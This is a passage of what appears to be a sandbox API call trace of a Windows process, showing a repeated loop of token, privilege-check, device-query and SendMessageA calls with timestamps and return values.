CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.837] GetLastError () returned 0x578 [0084.837] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.837] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.837] GetCurrentThread () returned 0xfffffffe [0084.837] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.837] GetLastError () returned 0x3f0 [0084.837] GetCurrentProcess () returned 0xffffffff [0084.837] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.837] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.837] SetLastError (dwErrCode=0x522) [0084.837] CloseHandle (hObject=0x114) returned 1 [0084.837] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.837] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.837] GetLastError () returned 0x578 [0084.837] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.837] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.837] GetCurrentThread () returned 0xfffffffe [0084.837] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.837] GetLastError () returned 0x3f0 [0084.837] GetCurrentProcess () returned 0xffffffff [0084.837] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.837] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.837] SetLastError (dwErrCode=0x522) [0084.837] CloseHandle (hObject=0x114) returned 1 [0084.837] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.837] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.837] GetLastError () returned 0x578 [0084.837] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.837] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.837] GetCurrentThread () returned 0xfffffffe [0084.837] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.837] GetLastError () returned 0x3f0 [0084.838] GetCurrentProcess () returned 0xffffffff [0084.838] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.838] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.838] SetLastError (dwErrCode=0x522) [0084.838] CloseHandle (hObject=0x114) returned 1 [0084.838] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.838] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.838] GetLastError () returned 0x578 [0084.838] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.838] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.838] GetCurrentThread () returned 0xfffffffe [0084.838] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.838] GetLastError () returned 0x3f0 [0084.838] GetCurrentProcess () returned 0xffffffff [0084.838] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.838] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.838] SetLastError (dwErrCode=0x522) [0084.838] CloseHandle (hObject=0x114) returned 1 [0084.838] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.838] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.838] GetLastError () returned 0x578 [0084.838] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.838] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.838] GetCurrentThread () returned 0xfffffffe [0084.838] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.838] GetLastError () returned 0x3f0 [0084.838] GetCurrentProcess () returned 0xffffffff [0084.838] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.838] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.838] SetLastError (dwErrCode=0x522) [0084.838] CloseHandle (hObject=0x114) returned 1 [0084.838] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.838] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.838] GetLastError () returned 0x578 [0084.838] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.838] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.838] GetCurrentThread () returned 0xfffffffe [0084.839] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.839] GetLastError () returned 0x3f0 [0084.839] GetCurrentProcess () returned 0xffffffff [0084.839] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.839] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.839] SetLastError (dwErrCode=0x522) [0084.839] CloseHandle (hObject=0x114) returned 1 [0084.839] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.839] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.839] GetLastError () returned 0x578 [0084.839] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.839] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.839] GetCurrentThread () returned 0xfffffffe [0084.839] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.839] GetLastError () returned 0x3f0 [0084.839] GetCurrentProcess () returned 0xffffffff [0084.839] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.839] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.839] SetLastError (dwErrCode=0x522) [0084.839] CloseHandle (hObject=0x114) returned 1 [0084.839] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.839] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.839] GetLastError () returned 0x578 [0084.839] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.839] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.839] GetCurrentThread () returned 0xfffffffe [0084.839] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.839] GetLastError () returned 0x3f0 [0084.839] GetCurrentProcess () returned 0xffffffff [0084.839] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.839] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.839] SetLastError (dwErrCode=0x522) [0084.839] CloseHandle (hObject=0x114) returned 1 [0084.839] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.839] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.839] GetLastError () returned 0x578 [0084.839] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.840] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.840] GetCurrentThread () returned 0xfffffffe [0084.840] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.840] GetLastError () returned 0x3f0 [0084.840] GetCurrentProcess () returned 0xffffffff [0084.840] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.840] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.840] SetLastError (dwErrCode=0x522) [0084.840] CloseHandle (hObject=0x114) returned 1 [0084.840] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.840] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.840] GetLastError () returned 0x578 [0084.840] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.840] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.840] GetCurrentThread () returned 0xfffffffe [0084.840] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.840] GetLastError () returned 0x3f0 [0084.840] GetCurrentProcess () returned 0xffffffff [0084.840] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.840] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.840] SetLastError (dwErrCode=0x522) [0084.840] CloseHandle (hObject=0x114) returned 1 [0084.840] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.840] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.840] GetLastError () returned 0x578 [0084.840] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.840] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.840] GetCurrentThread () returned 0xfffffffe [0084.840] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.840] GetLastError () returned 0x3f0 [0084.840] GetCurrentProcess () returned 0xffffffff [0084.840] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.840] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.840] SetLastError (dwErrCode=0x522) [0084.840] CloseHandle (hObject=0x114) returned 1 [0084.840] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.840] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.840] GetLastError () returned 0x578 [0084.840] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.840] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.841] GetCurrentThread () returned 0xfffffffe [0084.841] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.841] GetLastError () returned 0x3f0 [0084.841] GetCurrentProcess () returned 0xffffffff [0084.841] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.841] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.841] SetLastError (dwErrCode=0x522) [0084.841] CloseHandle (hObject=0x114) returned 1 [0084.841] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.841] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.841] GetLastError () returned 0x578 [0084.841] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.841] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.841] GetCurrentThread () returned 0xfffffffe [0084.841] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.841] GetLastError () returned 0x3f0 [0084.841] GetCurrentProcess () returned 0xffffffff [0084.841] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.841] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.841] SetLastError (dwErrCode=0x522) [0084.841] CloseHandle (hObject=0x114) returned 1 [0084.841] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.841] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.841] GetLastError () returned 0x578 [0084.841] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.841] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.841] GetCurrentThread () returned 0xfffffffe [0084.841] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.841] GetLastError () returned 0x3f0 [0084.841] GetCurrentProcess () returned 0xffffffff [0084.841] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.841] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.841] SetLastError (dwErrCode=0x522) [0084.841] CloseHandle (hObject=0x114) returned 1 [0084.841] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.841] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.841] GetLastError () returned 0x578 [0084.842] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.842] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.842] GetCurrentThread () returned 0xfffffffe [0084.842] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.842] GetLastError () returned 0x3f0 [0084.842] GetCurrentProcess () returned 0xffffffff [0084.842] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.842] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.842] SetLastError (dwErrCode=0x522) [0084.842] CloseHandle (hObject=0x114) returned 1 [0084.842] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.842] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.842] GetLastError () returned 0x578 [0084.842] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.842] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.842] GetCurrentThread () returned 0xfffffffe [0084.842] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.842] GetLastError () returned 0x3f0 [0084.842] GetCurrentProcess () returned 0xffffffff [0084.842] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.842] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.842] SetLastError (dwErrCode=0x522) [0084.842] CloseHandle (hObject=0x114) returned 1 [0084.842] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.842] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.842] GetLastError () returned 0x578 [0084.842] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.842] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.842] GetCurrentThread () returned 0xfffffffe [0084.842] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.842] GetLastError () returned 0x3f0 [0084.842] GetCurrentProcess () returned 0xffffffff [0084.842] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.842] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.842] SetLastError (dwErrCode=0x522) [0084.842] CloseHandle (hObject=0x114) returned 1 [0084.842] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.842] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.843] GetLastError () returned 0x578 [0084.843] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.843] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.843] GetCurrentThread () returned 0xfffffffe [0084.843] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.843] GetLastError () returned 0x3f0 [0084.843] GetCurrentProcess () returned 0xffffffff [0084.843] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.843] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.843] SetLastError (dwErrCode=0x522) [0084.843] CloseHandle (hObject=0x114) returned 1 [0084.843] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.843] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.843] GetLastError () returned 0x578 [0084.843] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.843] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.843] GetCurrentThread () returned 0xfffffffe [0084.843] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.843] GetLastError () returned 0x3f0 [0084.843] GetCurrentProcess () returned 0xffffffff [0084.843] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.843] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.843] SetLastError (dwErrCode=0x522) [0084.843] CloseHandle (hObject=0x114) returned 1 [0084.843] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.843] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.843] GetLastError () returned 0x578 [0084.843] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.843] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.843] GetCurrentThread () returned 0xfffffffe [0084.843] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.843] GetLastError () returned 0x3f0 [0084.843] GetCurrentProcess () returned 0xffffffff [0084.843] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.843] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.843] SetLastError (dwErrCode=0x522) [0084.843] CloseHandle (hObject=0x114) returned 1 [0084.843] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.843] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.843] GetLastError () returned 0x578 [0084.843] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.843] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.843] GetCurrentThread () returned 0xfffffffe [0084.843] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.844] GetLastError () returned 0x3f0 [0084.844] GetCurrentProcess () returned 0xffffffff [0084.844] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.844] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.844] SetLastError (dwErrCode=0x522) [0084.844] CloseHandle (hObject=0x114) returned 1 [0084.844] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.844] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.844] GetLastError () returned 0x578 [0084.844] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.844] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.844] GetCurrentThread () returned 0xfffffffe [0084.844] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.844] GetLastError () returned 0x3f0 [0084.844] GetCurrentProcess () returned 0xffffffff [0084.844] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.844] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.844] SetLastError (dwErrCode=0x522) [0084.844] CloseHandle (hObject=0x114) returned 1 [0084.844] SendMessageA (hWnd=0x0, Msg=0x1006, 